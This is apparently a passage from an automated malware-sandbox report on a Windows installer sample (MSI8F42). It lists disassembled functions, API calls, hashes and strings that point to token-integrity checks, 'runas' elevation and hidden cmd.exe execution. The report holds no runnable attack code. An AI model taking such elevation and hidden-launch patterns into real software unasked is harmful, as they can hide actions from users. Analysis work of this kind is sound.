                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 928366108-0
                                                                                                                                            • Opcode ID: 831deee395830faf24e23965e84f9d6f5a6795b107fc41cab2e0d874ce3eed35
                                                                                                                                            • Instruction ID: ba9ef3d17c9252774a1b85b1c4baf25edb558871304246d23c8297c55d37ae5c
                                                                                                                                            • Opcode Fuzzy Hash: 831deee395830faf24e23965e84f9d6f5a6795b107fc41cab2e0d874ce3eed35
                                                                                                                                            • Instruction Fuzzy Hash: 7C22B070D0434CDFEB11CFA8C848BAEFBB8AF45344F1481A9E509EB281D7759A45CB51
                                                                                                                                            Function 002F6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 105 2f6a50-2f6a82 106 2f6a84-2f6aa2 call 312937 105->106 107 2f6aa3-2f6add GetCurrentProcess OpenProcessToken 105->107 111 2f6adf-2f6af2 107->111 112 2f6b09-2f6b1e call 2f5de0 107->112 113 2f6af4-2f6afb CloseHandle 111->113 114 2f6b02-2f6b04 111->114 118 2f6b2e-2f6b30 112->118 119 2f6b20-2f6b2c call 2f1770 112->119 113->114 116 2f6c24-2f6c2b call 2f57c0 114->116 128 2f6ddb-2f6e06 call 2f2310 116->128 129 2f6c31-2f6c35 116->129 122 2f6b3f-2f6ba5 call 2f5f40 call 2f24c0 118->122 123 2f6b32-2f6b3d call 2f1770 118->123 119->111 143 2f6bdb 122->143 144 2f6ba7-2f6ba9 122->144 123->111 138 2f6e0c-2f6e2b call 2f46f0 128->138 139 2f6f96-2f6fa0 call 2f11d0 128->139 129->128 133 2f6c3b-2f6c3d 129->133 133->128 134 2f6c43-2f6c59 call 2f2310 133->134 134->139 145 2f6c5f-2f6c7e call 2f46f0 134->145 161 2f6e2d-2f6e2f 138->161 162 2f6e59-2f6e6a call 2f2310 138->162 146 2f6bdd-2f6c14 call 2f2e60 * 2 call 2f1770 143->146 149 2f6baf-2f6bb8 144->149 150 2f6c88-2f6c8a 144->150 171 2f6cad-2f6cc9 call 2f2310 145->171 172 2f6c80-2f6c82 145->172 146->116 184 2f6c16-2f6c1d CloseHandle 146->184 149->143 153 2f6bba-2f6bbc 149->153 150->146 157 2f6bbf 153->157 157->143 158 2f6bc1-2f6bc4 157->158 158->150 165 2f6bca-2f6bd9 158->165 163 2f6e35-2f6e3a 161->163 164 2f6e31-2f6e33 161->164 162->139 181 2f6e70-2f6e8c call 2f46f0 162->181 170 2f6e40-2f6e49 163->170 169 2f6e4f-2f6e54 call 2f4ac0 164->169 165->143 165->157 169->162 170->170 176 2f6e4b-2f6e4d 170->176 171->139 186 2f6ccf-2f6ceb call 2f46f0 171->186 178 2f6c8f-2f6c91 172->178 179 2f6c84-2f6c86 172->179 176->169 185 2f6c94-2f6c9d 178->185 183 2f6ca3-2f6ca8 call 2f4ac0 179->183 194 2f6e8e-2f6e90 181->194 195 2f6eb9-2f6ec6 call 2f2310 181->195 183->171 184->116 185->185 188 2f6c9f-2f6ca1 185->188 203 2f6ced-2f6cef 186->203 204 2f6d19-2f6d26 call 2f2310 186->204 188->183 198 2f6e96-2f6e9b 194->198 199 2f6e92-2f6e94 194->199 195->139 208 2f6ecc-2f6ee8 call 2f46f0 195->208 201 2f6ea0-2f6ea9 198->201 200 2f6eaf-2f6eb4 call 2f4ac0 199->200 200->195 201->201 206 2f6eab-2f6ead 201->206 209 2f6cf5-2f6cfa 203->209 210 2f6cf1-2f6cf3 203->210 204->139 214 2f6d2c-2f6d48 call 2f46f0 204->214 206->200 222 2f6eea-2f6eec 208->222 223 2f6f10-2f6f47 call 2f52f0 208->223 213 2f6d00-2f6d09 209->213 212 2f6d0f-2f6d14 call 2f4ac0 210->212 212->204 213->213 216 2f6d0b-2f6d0d 213->216 230 2f6d4a-2f6d4c 214->230 231 2f6d70-2f6d85 call 2f4ba0 214->231 216->212 226 2f6eee-2f6ef0 222->226 227 2f6ef2-2f6ef4 222->227 235 2f6f49-2f6f4c 223->235 236 2f6f51-2f6f65 223->236 232 2f6f06-2f6f0b call 2f4ac0 226->232 228 2f6ef7-2f6f00 227->228 228->228 233 2f6f02-2f6f04 228->233 237 2f6d4e-2f6d50 230->237 238 2f6d52-2f6d54 230->238 240 2f6d8a-2f6da4 231->240 232->223 233->232 235->236 242 2f6f6f-2f6f76 236->242 243 2f6f67-2f6f6a 236->243 241 2f6d66-2f6d6b call 2f4ac0 237->241 244 2f6d57-2f6d60 238->244 245 2f6dae-2f6dc2 240->245 246 2f6da6-2f6da9 240->246 241->231 249 2f6f79-2f6f84 242->249 243->242 244->244 247 2f6d62-2f6d64 244->247 250 2f6dcc-2f6dd6 245->250 251 2f6dc4-2f6dc7 245->251 246->245 247->241 252 2f6f8e 249->252 253 2f6f86-2f6f89 249->253 250->249 251->250 252->139 253->252
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 002F6AC8
                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 002F6AD5
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F6AF5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                            • String ID: S-1-5-18
                                                                                                                                            • API String ID: 4052875653-4289277601
                                                                                                                                            • Opcode ID: 4850dc48c0882f7f6142314f605d342c63ef12697aac16263c02ca36a3c5392e
                                                                                                                                            • Instruction ID: 29ec5ec0351419e3d06c02b5e37c3f7ed174b87d04d655c0e2b0312c5aec9ab1
                                                                                                                                            • Opcode Fuzzy Hash: 4850dc48c0882f7f6142314f605d342c63ef12697aac16263c02ca36a3c5392e
                                                                                                                                            • Instruction Fuzzy Hash: BA02A27091021ECBDF14DFA4C9587BEFBB5EF05354F148268DA42AB281EB70AE15CB90
                                                                                                                                            Function 002F57C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 254 2f57c0-2f57df GetCurrentProcess OpenProcessToken 255 2f57e7-2f5814 GetTokenInformation 254->255 256 2f57e1-2f57e6 254->256 257 2f581e-2f582e CloseHandle 255->257 258 2f5816-2f581b 255->258 258->257
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,7642E7B1,?,-00000010), ref: 002F57D0
                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 002F57D7
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 002F580C
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002F5822
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 215268677-0
                                                                                                                                            • Opcode ID: 95382b8a0ce82ad2a1548dc512dfc15aab55f05581560106cf68c1a25517dcdd
                                                                                                                                            • Instruction ID: c2e64a68886296834504bfd8548915a8c75c4f39b6ca18893bee44659c4a808c
                                                                                                                                            • Opcode Fuzzy Hash: 95382b8a0ce82ad2a1548dc512dfc15aab55f05581560106cf68c1a25517dcdd
                                                                                                                                            • Instruction Fuzzy Hash: C8F036B4148305AFE7119F10ED45BAABBECFB44741F508829FE84C2160D379955CDB63
                                                                                                                                            Function 002FCDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetCommandLineW.KERNEL32(7642E7B1,?,?,?,?,?,?,?,?,?,003356D5,000000FF), ref: 002FCDE8
                                                                                                                                              • Part of subcall function 002F1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,002F4251,7642E7B1,00000000,?,00000000,?,?,?,00334400,000000FF,?), ref: 002F1F9D
                                                                                                                                            • ExitProcess.KERNEL32 ref: 002FCEB1
                                                                                                                                              • Part of subcall function 002F6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 002F667E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                            • String ID: Full command line:
                                                                                                                                            • API String ID: 1878577176-831861440
                                                                                                                                            • Opcode ID: f8e7d77de38b655c46ee8812769692de45d0e9866159d92d3d66fb9c447b9b58
                                                                                                                                            • Instruction ID: 864e557a73d9a7aaae7b9f0f2dd9f5939c4eb6458b1625c3c00159f4060c69d0
                                                                                                                                            • Opcode Fuzzy Hash: f8e7d77de38b655c46ee8812769692de45d0e9866159d92d3d66fb9c447b9b58
                                                                                                                                            • Instruction Fuzzy Hash: FA21B17192021CABCB15FB60CD55BBEB3A5AF44780F644138E502AB292EF745A28CB91
                                                                                                                                            Function 002F5E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 291 2f5e40-2f5ebc GetTokenInformation 292 2f5ebe-2f5ec7 GetLastError 291->292 293 2f5f20-2f5f33 291->293 292->293 294 2f5ec9-2f5ed7 292->294 295 2f5ede 294->295 296 2f5ed9-2f5edc 294->296 297 2f5f0e-2f5f1a GetTokenInformation 295->297 298 2f5ee0-2f5ee7 295->298 299 2f5f0b 296->299 297->293 300 2f5ee9-2f5ef5 call 2f60d0 298->300 301 2f5ef7-2f5f08 call 314080 298->301 299->297 300->297 301->299
                                                                                                                                            APIs
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5EB4
                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5EBE
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5F1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationToken$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2567405617-0
                                                                                                                                            • Opcode ID: c08358f08913c92d8083d7e69b7dcfae60ddb67ce2bc620f430478c238723531
                                                                                                                                            • Instruction ID: 7b71daf6c2bcb5dd36f4c4d3f94e624da182dfa361158f6e83f95bae4361f19f
                                                                                                                                            • Opcode Fuzzy Hash: c08358f08913c92d8083d7e69b7dcfae60ddb67ce2bc620f430478c238723531
                                                                                                                                            • Instruction Fuzzy Hash: B1318EB1A106199FD724CF59CC85BBFFBF9FB44710F10452DE616A7680DBB5A9008B90
                                                                                                                                            Function 0032591D Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 306 32591d-325931 GetLastError 307 325933-32593b call 3275d7 306->307 308 32594d-325957 call 327616 306->308 313 325948 307->313 314 32593d-325946 307->314 315 325959-32595b 308->315 316 32595d-325965 call 3270bb 308->316 313->308 317 3259c2-3259cd SetLastError 314->317 315->317 319 32596a-325970 316->319 320 325972-325981 call 327616 319->320 321 325983-325991 call 327616 319->321 326 3259a2-3259a8 call 3253b8 320->326 327 325993-3259a1 call 327616 321->327 328 3259aa-3259bf call 3255fa call 3253b8 321->328 335 3259c1 326->335 327->326 328->335 335->317
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00317375,00325458,?,00316CE7,00000000,A82,00000000,?,?,?,0032363B,?,00000000,00000004), ref: 00325921
                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 003259C3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                            • Opcode ID: 9758e4eea8342c00126f0fbfe6c42fda5826e9fa8a5d34b482f2fc621f174468
                                                                                                                                            • Instruction ID: d6fc3989d390b62c5ec9ea535bbc20e134c5d8e67eaef7af43e69a2d2613a691
                                                                                                                                            • Opcode Fuzzy Hash: 9758e4eea8342c00126f0fbfe6c42fda5826e9fa8a5d34b482f2fc621f174468
                                                                                                                                            • Instruction Fuzzy Hash: B9112B75219B32EED7136B74BCCAE2B264CAB027B9F100520F6059D1A1EFB0DE4491A0
                                                                                                                                            Function 003270BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 338 3270bb-3270c6 339 3270d4-3270da 338->339 340 3270c8-3270d2 338->340 342 3270f3-327104 RtlAllocateHeap 339->342 343 3270dc-3270dd 339->343 340->339 341 327108-327113 call 317370 340->341 348 327115-327117 341->348 344 327106 342->344 345 3270df-3270e6 call 325245 342->345 343->342 344->348 345->341 351 3270e8-3270f1 call 32bf83 345->351 351->341 351->342
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,0032596A,00000001,00000364,?,00000006,000000FF,?,00316CE7,00000000,A82,00000000), ref: 003270FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 7764497418bf9ed09dcc9c0beda91b782de01a391ae7f768562779938e61a3aa
                                                                                                                                            • Instruction ID: 8354a71773e0599ca98d500b95c2218334c6e700e972a91c3b92675ab5e14197
                                                                                                                                            • Opcode Fuzzy Hash: 7764497418bf9ed09dcc9c0beda91b782de01a391ae7f768562779938e61a3aa
                                                                                                                                            • Instruction Fuzzy Hash: A6F0E23120C2306AEB335A22BC02B5BB75DBF517B1F168021BC149E190CF30FC1186E1

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 002F52F0 Relevance: 54.7, APIs: 14, Strings: 17, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 419 2f52f0-2f53a8 call 2f63a0 call 2f5d30 * 2 call 2f59c0 428 2f53ae-2f53bd 419->428 429 2f57b0-2f57ba call 2f11d0 419->429 430 2f53bf-2f53c7 call 2f49a0 428->430 431 2f53c9-2f53db call 317852 428->431 430->431 431->429 438 2f53e1-2f540a call 2f5d30 431->438 441 2f540c-2f540f 438->441 442 2f5414-2f5419 438->442 441->442 443 2f54cf-2f551b 442->443 444 2f541f-2f5429 442->444 446 2f551d-2f5526 GetForegroundWindow 443->446 447 2f5529-2f552b 443->447 445 2f5430-2f5436 444->445 448 2f5438-2f543b 445->448 449 2f5456-2f5458 445->449 446->447 450 2f55f7-2f5607 ShellExecuteExW 447->450 451 2f5531-2f5535 447->451 452 2f543d-2f5445 448->452 453 2f5452-2f5454 448->453 454 2f545b-2f545d 449->454 457 2f5609-2f5612 call 2f5890 450->457 458 2f5614-2f5616 450->458 455 2f5537-2f553e 451->455 456 2f5540-2f554c 451->456 452->449 461 2f5447-2f5450 452->461 453->454 462 2f545f 454->462 463 2f5493-2f54cc GetWindowsDirectoryW call 2f5b10 * 2 454->463 455->455 455->456 464 2f5550-2f555d 456->464 457->458 459 2f5618-2f561e 458->459 460 2f5646-2f5666 call 2f5b30 458->460 466 2f5625-2f563b ShellExecuteExW 459->466 467 2f5620-2f5623 459->467 483 2f56fd-2f5702 460->483 484 2f566c-2f5696 GetModuleHandleW GetProcAddress AllowSetForegroundWindow 460->484 461->445 461->453 470 2f5464-2f546a 462->470 463->443 464->464 471 2f555f-2f556b 464->471 466->460 474 2f563d-2f5641 call 2f5890 466->474 467->460 467->466 477 2f546c-2f546f 470->477 478 2f548a-2f548c 470->478 473 2f5570-2f557d 471->473 473->473 479 2f557f-2f55f5 call 2f64a0 * 5 473->479 474->460 485 2f5486-2f5488 477->485 486 2f5471-2f5479 477->486 480 2f548f-2f5491 478->480 479->450 480->443 480->463 489 2f5704-2f570c 483->489 490 2f5721-2f5744 call 2f5940 483->490 484->483 498 2f5698-2f569f 484->498 485->480 486->478 491 2f547b-2f5484 486->491 489->490 493 2f570e-2f571b WaitForSingleObject GetExitCodeProcess 489->493 500 2f574e-2f5762 490->500 501 2f5746-2f5749 490->501 491->470 491->485 493->490 498->483 502 2f56a1-2f56b2 GetModuleHandleW GetProcAddress 498->502 503 2f576c-2f5781 500->503 504 2f5764-2f5767 500->504 501->500 506 2f56fa 502->506 507 2f56b4-2f56c1 502->507 508 2f578b-2f57af call 312937 503->508 509 2f5783-2f5786 503->509 504->503 506->483 514 2f56c3-2f56c6 507->514 509->508 517 2f56ef-2f56f1 514->517 518 2f56c8-2f56eb Sleep EnumWindows 514->518 517->506 521 2f56f3-2f56f4 BringWindowToTop 517->521 518->514 520 2f56ed 518->520 520->521 521->506
                                                                                                                                            APIs
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 002F549C
                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 002F551D
                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 002F5601
                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 002F5637
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 002F567C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F5685
                                                                                                                                            • AllowSetForegroundWindow.USER32(00000000), ref: 002F568B
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 002F56AB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F56AE
                                                                                                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 002F56CA
                                                                                                                                            • EnumWindows.USER32(002F5830,?), ref: 002F56DF
                                                                                                                                            • BringWindowToTop.USER32(00000000), ref: 002F56F4
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 002F5711
                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 002F571B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                            • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<S4$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                            • API String ID: 697762045-2715264502
                                                                                                                                            • Opcode ID: 0dbf86bcaa948ac28285fe6c08f34bde7eaa6c41158bd1a7c5c173b1d7009e0b
                                                                                                                                            • Instruction ID: 39d7a80c77f4435f134dc280a05cfc218df1581a75f800d14fb0c8966a1ac63d
                                                                                                                                            • Opcode Fuzzy Hash: 0dbf86bcaa948ac28285fe6c08f34bde7eaa6c41158bd1a7c5c173b1d7009e0b
                                                                                                                                            • Instruction Fuzzy Hash: 6BE1EF75E10A1A9BCF21DFA8C884BBEF7F5AF44350F544128EA15EB291E734AD00CB90
                                                                                                                                            Function 002FC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 002FCBB6
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0034E6D0,00000800), ref: 002FCBD3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                            • API String ID: 4153817207-482544602
                                                                                                                                            • Opcode ID: b981871bee49b23e7faf53093240f014c8146cb846955d162778a872943da06c
                                                                                                                                            • Instruction ID: a2c2d20c4efc7d3b03fd4dc644cc3aa49d3d8f5df94ed446f3caf356ae047f21
                                                                                                                                            • Opcode Fuzzy Hash: b981871bee49b23e7faf53093240f014c8146cb846955d162778a872943da06c
                                                                                                                                            • Instruction Fuzzy Hash: 5EC1157892021F8BCB259F14C60127AF3A1EF917C0F74447AEA4A9B255E770DD61C790
                                                                                                                                            Function 0032DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,003242D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0032DEE5
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003242D9,?,?,?,00000055,?,-00000050,?,?), ref: 0032DF10
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0032DFA4
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0032DFB2
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0032E073
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
